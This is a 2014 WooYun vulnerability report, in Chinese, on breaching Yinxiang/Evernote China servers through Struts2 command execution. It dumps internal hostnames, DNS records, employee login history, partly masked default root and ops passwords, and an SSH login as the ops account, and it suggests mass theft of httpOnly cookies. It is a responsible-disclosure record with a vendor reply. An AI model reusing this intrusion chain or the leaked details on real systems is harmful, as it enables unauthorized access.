当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064640

漏洞标题:对印象笔记一次浅尝辄止的安全测试(成功突破美国网络边界Evernote.com)

相关厂商:印象笔记

漏洞作者: 猪猪侠

提交时间:2014-06-12 14:54

修复时间:2014-07-27 14:56

公开时间:2014-07-27 14:56

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-12: 细节已通知厂商并且等待厂商处理中
2014-06-14: 厂商已经确认,细节仅向厂商公开
2014-06-24: 细节向核心白帽子及相关领域专家公开
2014-07-04: 细节向普通白帽子公开
2014-07-14: 细节向实习白帽子公开
2014-07-27: 细节向公众公开

简要描述:

对印象笔记的一次安全测试,浅尝辄止!
结果证明可以突破网络边界,印象笔记中国与美国Evernote.com总部通过VPN互联,直接通过内部VPN网络即可接入美国Evernote.com总部内网,连接内部enops.net的子域。

详细说明:

#1 漏洞成因
一次偶然的机会,扫描器捕捉到如下三个网址存在struts2命令执行漏洞,且可以成功利用
http://119.254.30.40/index.action
https://wechat.yinxiang.com/en/authCallback.action
https://tools.yinxiang.com/wb/auth.action
WEB目录
/opt/tomcat8081/webapps/ROOT/
直接GETSHELL

yinxiang__.jpg


关键信息

# if you run this script manually, please use the sudo -u en-www bash /home/en-www/update-webdata.sh 
cd /home/en-www; git pull origin master
#! /bin/bash
#rollback ROOT.war to the last one.
cp /home/en-www/backup/ROOT.war.last /var/lib/tomcat6/webapps/ROOT.war
/etc/init.d/tomcat restart
Linux app001.wechat 3.2.10-xen #2 SMP Wed Mar 14 07:31:12 PDT 2012 x86_64 GNU/Linux
#
# This file is manged by puppet
#
127.0.0.1 localhost.localdomain localhost
10.192.50.52 app001.wechat.bj1.enops.net app001
; <<>> DiG 9.7.3 <<>> master.wechat.bj1.enops.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23508
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; QUESTION SECTION:
;master.wechat.bj1.enops.net. IN A
;; ANSWER SECTION:
master.wechat.bj1.enops.net. 1800 IN CNAME app001.wechat.bj1.enops.net.
app001.wechat.bj1.enops.net. 1800 IN A 10.192.50.52
;; AUTHORITY SECTION:
bj1.enops.net. 1800 IN NS admin001.bj1.enops.net.
bj1.enops.net. 1800 IN NS admin002.bj2.enops.net.
bj1.enops.net. 1800 IN NS admin002.bj1.enops.net.
bj1.enops.net. 1800 IN NS admin001.bj2.enops.net.
;; ADDITIONAL SECTION:
admin001.bj1.enops.net. 1800 IN A 10.192.9.20
admin001.bj2.enops.net. 1800 IN A 10.193.9.20
admin002.bj1.enops.net. 1800 IN A 10.192.9.21
admin002.bj2.enops.net. 1800 IN A 10.193.9.21
;; Query time: 0 msec
;; SERVER: 10.192.9.20#53(10.192.9.20)
;; WHEN: Fri Jul 19 15:22:58 2013
;; MSG SIZE rcvd: 242


achen pts/1 vpn-rwc.corp.et**.enops.net


$ last
hxiao pts/0 10.192.8.28 Fri Jul 19 06:31 - 07:00 (00:28)
hxiao pts/0 10.192.8.28 Fri Jul 19 06:08 - 06:16 (00:08)
hxiao pts/0 10.192.8.28 Thu Jul 18 04:13 - 07:51 (03:37)
hxiao pts/0 10.192.8.28 Wed Jul 17 01:06 - 10:57 (09:51)
jrevita pts/1 10.192.8.28 Tue Jul 16 21:55 - 21:57 (00:01)
gplasky pts/0 10.192.8.28 Tue Jul 16 21:01 - 00:39 (03:37)
gplasky pts/0 10.192.8.28 Tue Jul 16 20:56 - 20:59 (00:03)
jrevita pts/1 10.192.8.28 Tue Jul 16 20:55 - 20:58 (00:02)
gplasky pts/0 10.192.8.28 Tue Jul 16 20:49 - 20:56 (00:06)
gplasky pts/0 10.192.8.28 Tue Jul 16 20:40 - 20:40 (00:00)
gplasky pts/0 10.192.8.28 Tue Jul 16 20:29 - 20:39 (00:10)
fyue pts/0 10.192.8.23 Tue Jul 16 10:04 - 10:04 (00:00)
hxiao pts/0 10.192.8.28 Tue Jul 16 03:38 - 07:14 (03:35)
hxiao pts/0 10.192.8.28 Mon Jul 15 02:49 - 10:40 (07:50)
hxiao pts/0 10.192.8.28 Mon Jul 15 01:56 - 01:57 (00:00)
hxiao pts/1 10.192.8.28 Sun Jul 14 20:08 - 21:12 (01:03)
hxiao pts/1 10.192.8.28 Sun Jul 14 19:56 - 20:00 (00:04)
hxiao pts/0 10.192.8.28 Sun Jul 14 19:40 - 21:11 (01:31)
hxiao pts/1 10.192.8.28 Fri Jul 12 07:59 - 08:27 (00:28)


#3 最最重要的环节来了
印象笔记的所有服务器运维都会通过如下setup.sh来自动化配置,也就是他们的每台服务器都会拥有一个默认账号enops,而且和root密码一样百年不变,ssh端口22022,你懂得!!!

if [ $# -eq 0 ];  then
echo -e "Usage: $0 hostname\n\tEX: $0 vpn01.enchina"
exit
fi
hostname=$1
enopspass="yinxian******"
rootpass="xp2********"
#setup hostname
echo "$hostname" > /etc/hostname
echo -e "127.0.0.1\t $hostname" > /etc/hosts
#setup root password
echo -e "${rootpass}\n${rootpass}" | passwd
#setup sshd
sed -i 's/Port 22$/Port 22022/g' /etc/ssh/sshd_config
sed -i 's/PermitRootLogin yes/PermitRootLogin no/g' /etc/ssh/sshd_config
#update apt source
echo "deb http://mirrors.163.com/debian squeeze main contrib non-free" > /etc/apt/sources.list
aptitude update
#set up enops user
groupadd enops
useradd -m -p `mkpasswd $enopspass` -g enops -s /bin/bash enops
aptitude install sudo
chmod 644 /etc/sudoers
sed -i '/%sudo/ a\%enops ALL=(ALL) ALL' /etc/sudoers
chmod 440 /etc/sudoers


#4 咱们来远程连接吧

root@kali:~# ssh -p 22022 enops@tools.yinxiang.com
The authenticity of host '[tools.yinxiang.com]:22022 ([115.28.33.231]:22022)' can't be established.
RSA key fingerprint is cc:2e:18:a8:56:c8:32:40:91:a3:b6:c8:7f:8a:7d:a2.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[tools.yinxiang.com]:22022,[115.28.33.231]:22022' (RSA) to the list of known hosts.
enops@tools.yinxiang.com's password:
Linux tools.enchina 2.6.32-5-amd64 #1 SMP Sun Jan 1 04:57:38 CST 2012 x86_64
Welcome to aliyun Elastic Compute Service!
Last login: Tue Mar 25 10:54:24 2014 from 183.81.181.234
enops@tools:~$ whoami
enops


yinxiang.jpg


试下启用一个端口映射,然后批量跨域获取印象笔记的cookie看看?dump you httpOnly cookies!
http://tools.yinxiang.com/

yinxiang1.jpg


yinxiang2.jpg

漏洞证明:

java.sql.Connection conn =
java.sql.DriverManager
.getConnection("jdbc:mysql://master.wechat.bj1.enops.net/wechat?user=yinxiang&password=bi***********n&useUnicode=true&characterEncoding=UTF-8");


内网远程一系列运维软件包括 splunk、zabbix,而且Zabbix是有个注入漏洞,可继续内网渗透,但由于是浅尝辄止的测试,就没去尝试了
http://drops.wooyun.org/papers/680

https://10.192.8.26:8000/zh-CN/account/login?return_to=%2Fzh-CN%2F
http://10.192.8.29/nagui/
http://splunk.bj1.enops.net


修复方案:

# 网络边界问题
# 运维默认口令问题

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-06-14 07:59

厂商回复:


感谢 猪猪侠 的渗透测试! 这是2013年7月stucts2漏洞爆发后,通过structs2漏洞进行的一次渗透,在7月25号我们完成了相应的安全处理. 事后我们对事件进行了回放,通过对系统log和交换机流量的分析,确认这只是一个渗透测试,没有做数据的拷贝和倒出.
印象笔记一直以来对安全非常重视,我们已经成立了安全响应中心(http:///security), 期望能够和各位专家一起不断提升印象笔记的安全性. 欢迎各位提意见和建议到 我爱乌云 .
最后再次感谢 猪猪侠!

最新状态:

2014-06-16:欢迎各位提意见和建议到 security at evernote dot com